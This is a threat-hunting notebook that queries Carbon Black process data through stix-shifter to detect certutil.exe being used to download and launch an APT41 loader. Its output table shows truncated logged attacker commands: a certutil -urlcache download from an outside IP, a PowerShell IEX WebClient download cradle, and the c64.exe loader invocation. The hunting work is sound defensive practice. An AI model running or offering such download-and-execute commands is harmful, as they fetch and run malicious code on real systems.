# CERTUTIL hunt

This notebook helps to collect all cmd (cmd.exe) and (certutil.exe) process executions in order to find suspicious activity.

This example demontrates how to found suspicious executation that downloaded by using certuil.exe, and then using certuil.exe to attack.

In [1]:
from pyclient.stix_shifter_dataframe import StixShifterDataFrame
from dateutil import parser
import huntlib

In [2]:
usr, psw = huntlib.util.promptCreds()

Username: ''
Password: ········


In [3]:
carbon_black_stix_bundle = 'https://raw.githubusercontent.com/opencybersecurityalliance/stix-shifter/develop/data/cybox/carbon_black/carbon_black_observable.json'
sb_config = {
    'connection': {
        "host": carbon_black_stix_bundle,
        "port": 443
    },
    'configuration': {
        "auth": {
            "username": usr,
            "password": psw
        }
    },
    'data_source': '{"type": "identity", "id": "identity--3532c56d-ea72-48be-a2ad-1a53f4c9c6d3", "name": "stix_boundle", "identity_class": "events"}'
}

In [4]:
def get_duration(duration):
    days, seconds = duration.days, duration.seconds
    hours = seconds // 3600
    minutes = (seconds % 3600) // 60
    seconds = seconds % 60
    return f"{days}d {hours}h {minutes}m {seconds}.{duration.microseconds//1000}s"

In [5]:
import re
def extract_string(data, regex, group):
    try:
        pattern = re.compile(regex)
        matches = pattern.search(data)
        return matches.group(group)
    except:
        return ''

# Fetch process data that are spawn by cmd

In [6]:
ssdf = StixShifterDataFrame()
ssdf.add_config('stix_bundle', sb_config)
cmd_query = "[process:name='cmd.exe']"
df = ssdf.search_df(query=cmd_query, config_names=['stix_bundle'])

In [7]:
df['first_observed'] = df['first_observed'].map(lambda x: parser.isoparse(x))
df['last_observed'] = df['last_observed'].map(lambda x: parser.isoparse(x))
df['duration'] = df['last_observed'] - df['first_observed']
df['duration'] = df['duration'].map(lambda dur: get_duration(dur))

# Found suspicious command line

In [8]:
df['cmd_certutil'] = df['process:command_line'].apply(extract_string, regex=r'certutil', group=0)
df['cmd_exe'] = df['process:command_line'].apply(extract_string, regex=r'[0-9a-zA-Z_-]*\.exe', group=0)
df['cmd_dat'] = df['process:command_line'].apply(extract_string, regex=r'[0-9a-zA-Z_-]*\.dat.', group=0)

# *.exe that was download by using certutil
exe_list = list(df[(df.cmd_certutil != '') & (df.cmd_exe != '')].cmd_exe.apply(lambda x: x.lower()).values)

# *.dat that was download by using certutil
dat_list = list(df[(df.cmd_certutil != '') & (df.cmd_dat != '')].cmd_dat.apply(lambda x: x.lower()).values)

# command line that contains both *.exe and *.dat
df[df.cmd_exe.isin(exe_list) & df.cmd_dat.isin(dat_list)]['process:command_line']

0    c64.exe f64.data "9839D7F1A0 -m"
Name: process:command_line, dtype: object

# Attack steps

In [9]:
fields = ['first_observed', 'last_observed', 'duration',
    'process:name', 'process:pid', 
    'process:binary_ref.name', 'process:parent_ref.name', 
    'network-traffic:dst_ref.value', 'network-traffic:src_ref.value', 
    'process:command_line', 'user-account:user_id'
]

df[fields].sort_values(by=['first_observed'])


,first_observed,last_observed,duration,process:name,process:pid,process:binary_ref.name,process:parent_ref.name,network-traffic:dst_ref.value,network-traffic:src_ref.value,process:command_line,user-account:user_id
0,2019-10-01 19:29:35+00:00,2019-10-01 19:29:35+00:00,0d 0h 0m 0.0s,,757,,cmd.exe,192.168.0.8,67.229.97.229,,SYSTEM
0,2019-10-03 14:53:35+00:00,2019-10-03 14:53:35+00:00,0d 0h 0m 0.0s,certutil.exe,744,certutil.exe,cmd.exe,127.0.0.1,67.229.97.229,certutil -urlcache -split -f http://67.229.97....,SYSTEM
0,2019-10-03 14:53:35+00:00,2019-10-03 14:53:35+00:00,0d 0h 0m 0.0s,certutil.exe,744,certutil.exe,cmd.exe,127.0.0.1,67.229.97.229,certutil -urlcache -split -f http://67.229.97....,SYSTEM
0,2019-10-03 14:53:35+00:00,2019-10-03 14:53:35+00:00,0d 0h 0m 0.0s,c64.exe,757,c64.exe,cmd.exe,127.0.0.1,,"c64.exe f64.data ""9839D7F1A0 -m""",SYSTEM
0,2019-10-03 14:53:35+00:00,2019-10-03 14:53:35+00:00,0d 0h 0m 0.0s,powershell.exe,2252,powershell.exe,cmd.exe,127.0.0.1,,"powershell ""IEX (New-Object Net.WebClient).Dow...",SYSTEM


In this notebook, we finally found that this is a APT attack , ```c64.exe f64.data "9839D7F1A0 -m" ```
Ref: https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html